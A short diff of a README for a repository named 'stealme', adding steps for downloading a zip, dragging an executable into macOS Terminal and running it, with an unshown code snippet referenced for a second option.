3raxton/stealme/README.md

 ```
 # Instructions

+## Option 1

+1. Download the .zip file from the top right hand corner of the Stealme repo

+2. Extract the files to your desktop

+3. Open terminal

+4. Drag the exec file into your terminal

+5. Press enter and follow the instructions from the file

+## Option 2

 First open Terminal on your Mac

 1. Copy the code listed above by selecting then pressing the ⌘ (Command) and C keys at the same time